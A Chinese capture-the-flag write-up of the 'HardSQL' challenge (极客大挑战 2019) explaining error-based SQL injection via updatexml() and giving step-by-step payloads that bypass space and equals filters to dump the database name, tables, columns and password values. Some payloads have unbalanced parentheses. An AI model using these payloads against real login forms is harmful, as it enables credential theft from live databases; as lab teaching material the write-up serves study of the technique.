[极客大挑战 2019]HardSQL1 解题记录

*前置知识

SQL 报错注入（Error-Based Injection）。当页面不直接显示数据库查询结果，但会回显数据库错误信息时，攻击者就可以利用它来获取数据。

简单来说，它的核心思想是：故意构造一个会导致数据库出错的 SQL 语句，并把我们想窃取的数据巧妙地“藏”在错误信息里返回出来。

1.updatexml()函数报错

这是最常用的方法之一。

• 函数作用：用于更新（查找并替换）XML 文档中指定节点的内容。
• 函数语法：UPDATExml(xml_document, xpath_string, new_value)
  • xml_document：一个 XML 格式的字符串或字段。
  • xpath_string：一个符合 XPath 语法的字符串，用于定位要修改的数据位置。
  • new_value：用来替换的新值。

2.extractvalue()函数报错

• 函数作用：从 XML 文档中提取指定节点的值。
• 函数语法：EXTRACTVALUE(XML_document, XPath_string)
  • XML_document：一个 XML 格式的字符串或字段。
  • XPath_string：一个符合 XPath 语法的字符串，用于定位要提取的数据位置。

本文将用updatexml()函数

1.题目环境

我们以密码为注入点,这里先使用万能密码去试试：1'or 1=1#

发现并未报错，有可能是过滤了什么，我们一个个试试

发现这里有空格和等于时候就会过滤，我们可以采用()和like用来绕过,再次尝试1'or((1)like(1))#,j进入了但是里面并没有东西，我们要注入数据表去看

接下来我们用bp去探测那些字符过滤了

发现也是大部分被过滤了，但是select，where这些还没有过滤，考虑采用updatexml进行注入。

这里可以记忆一个结构1'or(updatexml(1,concat(0x7e，,0x7e),1))#

0x7e是'~',concat函数用来连接字符

1'or(updatexml(1,concat(0x7e,database(),0x7e),1))#

爆出库名

接下来就是表名

1'or(updatexml(1,concat(0x7e,select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#

爆字段名

1'or(updatexml(1,concat(0x7e,select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))#

爆flag

1'or(updatexml(1,concat(0x7e,select(group_concat(username,'~',password))from(H4rDsq1)),0x7e),1))#

注意：这里字段名不用加''。

这里的话只是前面一部分应为这个报错只会输出32个字符，我们可以使用 right去获取后面一部分

1'or(updatexml(1,concat(0x7e,select(group_concat((right(password,20))))from(H4rDsq1)),0x7e),1))#